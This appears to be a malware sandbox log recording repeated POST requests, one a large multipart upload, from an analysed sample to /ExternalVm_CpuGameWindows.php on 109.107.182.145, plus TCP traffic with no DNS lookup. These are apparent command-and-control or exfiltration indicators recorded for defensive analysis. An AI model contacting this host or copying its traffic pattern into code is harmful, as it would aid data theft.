Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2136Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2564Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: multipart/form-data; boundary=----09pDRrD0nZucDbA3LEhaxRdEovAqcnN7dgUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 217102Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2148Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2148Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2148Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2124Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2560Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2148Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2148Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2560Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2148Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2564Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2148Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2148Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2564Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2148Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2564Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2148Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2108Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ExternalVm_CpuGameWindows.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 109.107.182.145Content-Length: 2568Expect: 100-continueConnection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
Source: unknown TCP traffic detected without corresponding DNS query: 109.107.182.145
